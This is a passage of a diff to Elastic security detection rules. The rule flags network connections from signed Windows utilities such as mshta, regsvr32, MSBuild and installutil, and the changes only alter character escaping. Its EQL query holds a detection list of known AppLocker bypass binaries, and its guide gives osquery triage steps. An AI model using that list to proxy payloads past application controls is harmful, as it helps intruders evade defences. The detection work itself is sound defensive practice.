user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_106.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_106.json index 7664af93675..7860e11902d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_107.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_107.json index 6cafd711b3e..deadd3f4c4c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_108.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_108.json index 0b9aa5808ac..5a9bc258274 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_108.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - 